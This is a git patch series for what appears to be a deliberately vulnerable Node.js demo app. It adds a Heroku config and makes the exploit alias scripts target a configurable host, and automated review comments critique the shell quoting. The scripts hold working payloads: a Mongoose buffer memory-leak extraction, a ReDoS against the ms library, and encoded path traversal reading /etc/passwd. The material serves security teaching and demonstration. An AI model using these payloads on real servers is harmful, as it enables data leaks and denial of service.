From f8a1f3b249d222c8a25789e2c7fec084378221d0 Mon Sep 17 00:00:00 2001
From: Guy Podjarny
Date: Tue, 18 Oct 2016 11:29:38 +0100
Subject: [PATCH 1/2] Add Heroku generated app.json
---
 app.json | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 app.json
diff --git a/app.json b/app.json
new file mode 100644
index 0000000000..1fd3b73a48
--- /dev/null
+++ b/app.json
@@ -0,0 +1,23 @@
+{
+ "name": "goof",
+ "scripts": {
+ },
+ "env": {
+ "MONGOLAB_URI": {
+ "required": true
+ }
+ },
+ "formation": {
+ "web": {
+ "quantity": 1
+ }
+ },
+ "addons": [
+ "mongolab"
+ ],
+ "buildpacks": [
+ {
+ "url": "heroku/nodejs"
+ }
+ ]
+}
From 6ebce5273d3884c4cb7a363ba5481727cd438165 Mon Sep 17 00:00:00 2001
From: Guy Podjarny
Date: Mon, 28 Nov 2016 10:09:02 +0100
Subject: [PATCH 2/2] chore: support an alternate host
---
 exploits/mongoose-exploits.sh | 18 +++++++++++-------
 exploits/ms-exploits.sh | 11 ++++++++---
 exploits/st-exploits.sh | 15 ++++++++++-----
 3 files changed, 29 insertions(+), 15 deletions(-)
diff --git a/exploits/mongoose-exploits.sh b/exploits/mongoose-exploits.sh
index 3aec24f225..09dbb8043a 100644
--- a/exploits/mongoose-exploits.sh
+++ b/exploits/mongoose-exploits.sh
@@ -1,26 +1,30 @@
 ### Note: these exploits use the httpie command line utility
+if [ -z "$GOOF_HOST" ]; then
+ export GOOF_HOST=http://localhost:3001
+fi
+
 # start
-alias mon1="http http://localhost:3001/ --headers"
+alias mon1="http $GOOF_HOST/ --headers"
 # Works as advertised
-alias mon2="echo 'content=Buy Beer' | http --form http://localhost:3001/create -v"
+alias mon2="echo 'content=Buy Beer' | http --form $GOOF_HOST/create -v"
 # Works with json
-alias mon3="echo '{\"content\":\"Fix the bike\"}' | http --json http://localhost:3001/create -v"
+alias mon3="echo '{\"content\":\"Fix the bike\"}' | http --json $GOOF_HOST/create -v"
 # Works with number string
-alias mon4="echo '{\"content\":\"800\"}' | http --json http://localhost:3001/create -v"
+alias mon4="echo '{\"content\":\"800\"}' | http --json $GOOF_HOST/create -v"
 # Exploit start - integer
-alias mon5="echo '{\"content\":800}' | http --json http://localhost:3001/create -v"
+alias mon5="echo '{\"content\":800}' | http --json $GOOF_HOST/create -v"
 # Switch to only showing the response body
-alias mon6="echo '{\"content\":800}' | http --json http://localhost:3001/create -b | base64 -D"
+alias mon6="echo '{\"content\":800}' | http --json $GOOF_HOST/create -b | base64 -D"
 # Repeatedly extract memory # window 1
-alias mon_repeat1="repeat 1000 echo '{\"content\":800}' | http --json http://localhost:3001/create -b | base64 -D >> leakedmem.bin"
+alias mon_repeat1="repeat 1000 echo '{\"content\":800}' | http --json $GOOF_HOST/create -b | base64 -D >> leakedmem.bin"
 # window 2 - see strings in the response
 alias mon_repeat2="tail -f leakedmem.bin | strings"
diff --git a/exploits/ms-exploits.sh b/exploits/ms-exploits.sh
index f35714152e..ea5a08c5c0 100644
--- a/exploits/ms-exploits.sh
+++ b/exploits/ms-exploits.sh
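Review bot: The rewritten alias bodies are double-quoted, so `$GOOF_HOST` is expanded once, when the file is sourced, and a later `export GOOF_HOST=...` in the same shell does nothing for `mon1`–`mon_repeat1` until the file is re-sourced; in addition, whatever the variable holds is pasted into the alias text and re-parsed as shell at each invocation, so a value containing quotes or metacharacters alters the command instead of just the URL. Single-quoting the alias body and quoting the expansion fixes both, e.g. `alias mon1='http "$GOOF_HOST/" --headers'`, and the guard block collapses to `: "${GOOF_HOST:=http://localhost:3001}"; export GOOF_HOST`. The same four-line guard is duplicated verbatim in the ms-exploits.sh and st-exploits.sh hunks of this patch; sourcing it from one shared file (say `exploits/goof-env.sh`, name illustrative) would keep the three in step. The re-added `mon6`/`mon_repeat1` lines keep `base64 -D`, which is the macOS spelling — GNU coreutils expects `-d` — so the host-override feature will not help a Linux user until that is made portable too.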
@@ -1,8 +1,13 @@
 # Working via curl
-alias ms1="echo 'content=Call mom in 20 minutes' | http --form http://localhost:3001/create -v"
+
+if [ -z "$GOOF_HOST" ]; then
+ export GOOF_HOST=http://localhost:3001
+fi
+
+alias ms1="echo 'content=Call mom in 20 minutes' | http --form $GOOF_HOST/create -v"
 # Works with long string that matches
-alias ms2="echo 'content=Buy milk in '\`printf "%.0s5" {1..60000}\`' minutes' | http --form http://localhost:3001/create -v"
+alias ms2="echo 'content=Buy milk in '\`printf "%.0s5" {1..60000}\`' minutes' | http --form $GOOF_HOST/create -v"
 # Hangs with long string that doesn't match
-alias ms3="echo 'content=Buy milk in '\`printf "%.0s5" {1..60000}\`' minutea' | http --form http://localhost:3001/create -v"
+alias ms3="echo 'content=Buy milk in '\`printf "%.0s5" {1..60000}\`' minutea' | http --form $GOOF_HOST/create -v"
diff --git a/exploits/st-exploits.sh b/exploits/st-exploits.sh
index e4f1d3a57f..dba780e5c8 100644
--- a/exploits/st-exploits.sh
+++ b/exploits/st-exploits.sh
@@ -1,14 +1,19 @@
 # Works as advertised
-alias st1="curl http://localhost:3001/public/about.html"
+
+if [ -z "$GOOF_HOST" ]; then
+ export GOOF_HOST=http://localhost:3001
+fi
+
+alias st1="curl $GOOF_HOST/public/about.html"
 # Directory listing (not necessary)
-alias st2="curl http://localhost:3001/public/"
+alias st2="curl $GOOF_HOST/public/"
 # Failed ../
-alias st3="curl http://localhost:3001/public/../../../"
+alias st3="curl $GOOF_HOST/public/../../../"
 # Exploit start
-alias st4="curl http://localhost:3001/public/%2e%2e/%2e%2e/%2e%2e/"
+alias st4="curl $GOOF_HOST/public/%2e%2e/%2e%2e/%2e%2e/"
 # Exploit full
-alias st5="curl http://localhost:3001/public/%2e%2e/%2e%2e/%2E%2E/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
+alias st5="curl $GOOF_HOST/public/%2e%2e/%2e%2e/%2E%2E/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
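Review bot: The new `GOOF_HOST` guard is inserted between `# Working via curl` and the `ms1` alias that comment describes — and the st-exploits.sh hunk does the same between `# Works as advertised` and `st1` — so each file now opens with a heading that reads as documentation of the host guard rather than of the first alias; placing the guard above the opening comment, as the mongoose-exploits.sh hunk does, keeps each comment adjacent to its alias. While moving it, `# Working via curl` is stale, since `ms1` invokes httpie (`http --form`) and not curl, and could read `# Works as advertised (httpie)`. The re-added `ms2`/`ms3` lines depend on the inner `"%.0s5"` closing and reopening the outer double quotes, which only works because the format string contains nothing shell-special; spelling the substitution as `\$(printf '%.0s5' {1..60000})` inside the double-quoted body makes the quoting intent explicit and drops the escaped backticks.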